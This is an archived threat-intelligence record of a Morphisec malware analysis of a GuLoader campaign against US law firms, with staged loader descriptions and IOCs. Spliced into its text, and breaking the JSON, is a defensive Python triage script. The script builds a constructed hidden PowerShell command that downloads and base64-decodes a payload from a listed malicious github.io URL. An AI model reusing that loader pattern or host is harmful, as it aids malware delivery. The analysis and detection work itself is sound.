{
	"id": "233dc5ca-9f53-4750-9819-b98bf2e1f27e",
	"created_at": "2026-04-06T00:13:52.863113Z",
	"updated_at": "2026-04-10T03:19:59.048444Z",
	"deleted_at": null,
	"sha1_hash": "000dfc7e32d8968276f3a27584555a7211b7e5fd",
	"title": "GuLoader Campaign Targets Law Firms in the US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1945928,
	"plain_text": "GuLoader Campaign Targets Law Firms in the US\r\nBy Arnold Osipov\r\nArchived: 2026-04-05 18:12:39 UTC\r\nSince April, Morphisec Labs has been closely monitoring an active GuLoader campaign that primarily targets law firms, along with healthcare and investment firms, specifically within the United States. GuLoader, also known as Cloudeye, has been active for over three years and has evolved continuously over that time. Its developers employ a range of anti-analysis techniques that make it difficult for security researchers to analyze.\r\nGuLoader is notorious for distributing numerous malware families, including NetWire, Lokibot, Xloader, Remcos, and others. It typically downloads its payload from legitimate hosting services such as Google Drive, OneDrive, GCloud, and more. In the campaign covered in this blog post, the threat actors used GuLoader to deliver the Remcos RAT (remote access trojan), with a `github.io` domain serving as the payload download source.\r\nFigure: GuLoader targeted sectors.\r\nInfection Chain\r\nhttps://blog.morphisec.com/guloader-the-rat-downloader\r\nPage 1 of 8\n\nThe PDF attachment appears to be locked and protected with a PIN, which the sender conveniently provides in the email. The lure message within the PDF claims that the file must be decrypted before it can be viewed, and to start the decryption the victim is enticed to click an icon embedded in the PDF.\r\nFigure: PDF lures the user to click the icon and download the payload.\r\nThe icon contains an embedded link which, once clicked, redirects the user to the final URL through DoubleClick, a popular ad-click service provided by Google. DoubleClick is widely used in online advertising and offers various capabilities, including the ability to track and gather statistics and metadata on user clicks. 
In this context, it is likely employed by the threat actors to measure the effectiveness of their campaign. The redirect URL in the chain prompts the user to enter the PIN that was previously sent via email. Once the PIN is provided, a GuLoader VBScript is downloaded, marking the next stage of the attack.\r\nFigure: GuLoader VBScript download page secured with a password.\r\nThe GuLoader VBScript is obfuscated and padded with junk code and random comments; the figure below shows the code after the redundant lines are removed. The script decodes and executes a PowerShell script.\r\nFigure: GuLoader VBScript.\r\nThe PowerShell script decodes and executes a second-stage PowerShell script using the 32-bit version of PowerShell, because the GuLoader shellcode is 32-bit.\r\nFigure: First stage PowerShell script.\r\nThe second-stage PowerShell script contains XOR-encoded strings that hold the logic responsible for downloading the GuLoader shellcode.\r\nFigure: Obfuscated second stage PowerShell script.\r\nThe de-obfuscated, simplified form of the script downloads the GuLoader shellcode from the `github.io` domain, base64-decodes it, and splits it into two parts:\r\n1. Decrypting shellcode\r\n2. Encrypted shellcode\r\nThe shellcode is then invoked by passing the decrypting part as the callback function to `CallWindowProcA`, with the encrypted shellcode and `NtProtectVirtualMemory` as arguments.\r\nFigure: Deobfuscated second stage PowerShell script.\r\nThe GuLoader shellcode was reviewed in previous blog posts and will not be covered in depth here. Fundamentally, the shellcode is responsible for downloading, decrypting, and injecting the final payload into an `ieinstal.exe` process. 
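The triage logic a defender would build from the chain just described, written here as an added Python example rather than code from Morphisec or from the loader itself. It assumes, for illustration only, that the XOR layer on the second stage is a single-byte key (the post does not describe the scheme) and it runs on a constructed process/script-block record, not the real second stage; the only material taken from the post is the list of IOC URLs at the end. It goes slightly beyond the text by recovering the XOR key from a known API-name crib before scanning, so that indicators the encoding hides still fire.

```python
# Added example (not Morphisec's code): offline triage of a PowerShell
# record for the GuLoader second-stage pattern described in the post.
# Two assumptions are made for illustration and are not stated on the
# page: the XOR layer is treated as single-byte XOR, and the sample record
# built at the bottom is constructed, it is not the real loader script.

# URLs copied from the IOC list at the end of this post, defanged as given.
IOC_URLS = [
    'quickcheckx[.]github.io/quickme/Udgan.u32',
    'quickcheckx[.]github.io/quickme/KmJiw22.bin',
    'quickcheckx[.]github.io/quickme/Panzersti.lpk',
    'quickcheckx[.]github.io/quickme/XbuLYedqxf70.bin',
    'zeusblog[.]cloud/Adobe.pdf',
]
CHAIN_FLAGS = ('syswow64_powershell', 'callwindowproc_callback',
               'github_io_download', 'base64_decode')


def refang(url):
    # Turn the defanged IOC form back into the form seen in raw logs.
    return url.replace('[.]', '.')


def xor_decode(blob, key):
    # Single-byte XOR (assumed scheme); XOR is its own inverse, so this
    # both encodes the sample and decodes it.
    return bytes(b ^ key for b in blob)


def recover_xor_key(blob, crib):
    # Known-plaintext key recovery: the loader has to name the APIs it
    # resolves, so the one key that makes the crib appear is the key.
    # Returns None if no single-byte key works (wrong crib or rolling key).
    for key in range(256):
        if crib in xor_decode(blob, key):
            return key
    return None


def extract_byte_arrays(script):
    # Collect every [byte[]](n,n,...) literal; the constructed sample stores
    # its XOR-encoded strings that way.
    blobs = []
    for chunk in script.split('[byte[]](')[1:]:
        body = chunk.split(')', 1)[0]
        blobs.append(bytes(int(x) for x in body.split(',')))
    return blobs


def triage(text):
    # One pass over a process/script-block record for the observable steps
    # of the chain: 32-bit PowerShell (SysWOW64 on 64-bit Windows), the
    # CallWindowProcA callback with NtProtectVirtualMemory, a github.io
    # download, base64 decoding of the blob, and any listed IOC URL.
    low = text.lower()
    flags = {
        'syswow64_powershell': 'syswow64' in low and 'powershell' in low,
        'callwindowproc_callback': ('callwindowproca' in low
                                    and 'ntprotectvirtualmemory' in low),
        'github_io_download': ('.github.io/' in low
                               and ('downloadstring' in low
                                    or 'downloaddata' in low)),
        'base64_decode': 'frombase64string' in low,
    }
    flags['ioc_urls'] = [u for u in IOC_URLS if refang(u).lower() in low]
    flags['score'] = (sum(1 for k in CHAIN_FLAGS if flags[k])
                      + (1 if flags['ioc_urls'] else 0))
    return flags


def triage_with_xor_recovery(script, crib=b'CallWindowProcA'):
    # Strip the XOR layer first, then triage the record together with the
    # decoded strings so indicators the encoding hides still fire.
    blobs = extract_byte_arrays(script)
    key = None
    for blob in blobs:
        key = recover_xor_key(blob, crib)
        if key is not None:
            break
    decoded = []
    if key is not None:
        decoded = [xor_decode(b, key).decode('latin-1') for b in blobs]
    result = triage(script + ' ' + ' '.join(decoded))
    result['xor_key'] = key
    result['decoded_strings'] = decoded
    return result


def build_sample_record():
    # Constructed stand-in (not the real script): the first-stage launch of
    # 32-bit PowerShell followed by a second stage whose URL and API names
    # are stored XOR-encoded with key 0x5A as byte arrays.
    key = 0x5A
    secrets = ['https://quickcheckx.github.io/quickme/Udgan.u32',
               'CallWindowProcA', 'NtProtectVirtualMemory']
    arrays = ['[byte[]](' + ','.join(str(b) for b in xor_decode(s.encode(), key)) + ')'
              for s in secrets]
    return ('C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c '
            'function d($b){-join($b|%{[char]($_ -bxor 90)})};'
            '$u=d(' + arrays[0] + ');$a=d(' + arrays[1] + ');$b=d(' + arrays[2] + ');'
            '$d=[Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($u))')


if __name__ == '__main__':
    rec = build_sample_record()
    print('raw score:', triage(rec)['score'])
    print('after XOR recovery:', triage_with_xor_recovery(rec))
```

Run as a script it shows the point of the second pass: on the raw record only the SysWOW64 launch and the base64 decode are visible (score 2), while after key recovery the API names, the github.io download and the listed IOC URL all match (score 5). A None key from recover_xor_key is itself useful signal: either the crib is wrong or the sample uses a rolling or multi-byte key, which is where a manual look at the decoder routine starts.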
It also downloads and opens a decoy PDF that shows a page-not-found error while the Remcos RAT runs in the background.\r\nFigure: Lure PDF while the payload is running in the background.\r\nGuLoader is appearing more frequently as a malware loader in phishing campaigns. It is one of the most advanced downloaders currently in use, and it usually downloads its payload from cloud hosting platforms; in this campaign, however, the payload was served from a plain `github.io` URL. Morphisec provides full protection against these and other malware loaders, such as InvalidPrinter.\r\nHow Morphisec Helps\r\nMorphisec’s Automated Moving Target Defense (AMTD) technology takes a preventative approach to cybersecurity, using an ultra-lightweight agent to block unauthorized processes (like GuLoader) deterministically rather than probabilistically. Morphisec AMTD secures runtime memory and critical infrastructure, preventing unauthorized code from executing regardless of whether a recognizable signature or behavior pattern exists. This protection extends to remote employees as well, and we encourage everyone to see Morphisec AMTD in action and how it protects critical systems against cyberattack.\r\nThe combination of detection-based tools with Moving Target Defense creates the most effective defense-in-depth against threats like GuLoader. 
To learn more, read the white paper: Zero Trust + Moving Target Defense: The Ultimate Ransomware Strategy.\r\nIndicators of Compromise (IOCs)\r\nPDF Files (SHA-256)\r\n06b3c92f9718da323c4d3a18d69629696dc5f799a7ddaef4e7415d117b345af4\r\n2438bfe409fb32b18fca95f95fff85a778502553ce627d0f25e54653c84e0e0c\r\n8ef6d783f8aaffffdecfa13bcc20b4f1a18f6c4c3c4cc22e93fb5c8d753ca338\r\n584f1b20d6a1939933663dd57e13603c7fe664f81a117f0d5456b4d448506b7d\r\n3c5d19be4d5e1f600c31f837b9650ad8c7508d6691f6cd4889d2178809703de7\r\na8f7f8900375ad8d2fda626f098cdda95bb4e42855cbae91c290d3f020bfd45f\r\n7add364a2a13388cc035e5f082f7adbb76c1e60d82748acd3eb30d6c9b3ce5be\r\na66b1a9fcf5d5fecd53152ecf68be150028109f484ad349d7029d72b3c5c9564\r\nVBS (SHA-256)\r\na3855846b501325a4b11cbc27fac9f845a56c91e088edbd75fb5ab651f913ede\r\n60d70005c38b331cd46b8af0f8e3d8cf181bdf43fb685a1962b1e26e085a6e2a\r\n2d343c091484eac696a23418f04df81c35bc538a10d25193ad014d11c4422907\r\nf78e18ae09d30f4062de466afb5e1de5041b6cda445b15a3cca912a3294f731a\r\nd63a863c26d03016ece637cd34c0f93efa1fe691b4328c7a915ef3c07ae1811f\r\n0873011390fd1d2dce527a726607255693c306774dfed8ac6b5b88efd4920d48\r\nc766754790aaf298acbf85229096d8f0493fa9ee64d429facd425e30ceceaa4b\r\n2ba636d017b5df7a706b4dfede215733807fff6db5fea202e4a5b6bf515ba8b4\r\na86c6baa5323f07155cf414cdfd667216fb2816ec999ad240042c78b86175492\r\nURLs\r\nquickcheckx[.]github.io/quickme/Udgan.u32\r\nquickcheckx[.]github.io/quickme/KmJiw22.bin\r\nquickcheckx[.]github.io/quickme/Panzersti.lpk\r\nquickcheckx[.]github.io/quickme/XbuLYedqxf70.bin\r\nzeusblog[.]cloud/Adobe.pdf\r\nC2\r\napdfhost[.]online\r\nAbout the author\r\nArnold Osipov\r\nMalware Researcher\r\nArnold Osipov is a Malware Researcher at Morphisec, who has spoken at BlackHat and been recognized by Microsoft Security for his contributions to malware research related to Microsoft Office. 
Prior to his arrival at Morphisec 6 years ago, Arnold was a Malware Analyst at Check Point.\r\nSource: https://blog.morphisec.com/guloader-the-rat-downloader",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.morphisec.com/guloader-the-rat-downloader"
	],
	"report_names": [
		"guloader-the-rat-downloader"
	],
	"threat_actors": [],
	"ts_created_at": 1775434432,
	"ts_updated_at": 1775791199,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/000dfc7e32d8968276f3a27584555a7211b7e5fd.pdf",
		"text": "https://archive.orkl.eu/000dfc7e32d8968276f3a27584555a7211b7e5fd.txt",
		"img": "https://archive.orkl.eu/000dfc7e32d8968276f3a27584555a7211b7e5fd.jpg"
	}
}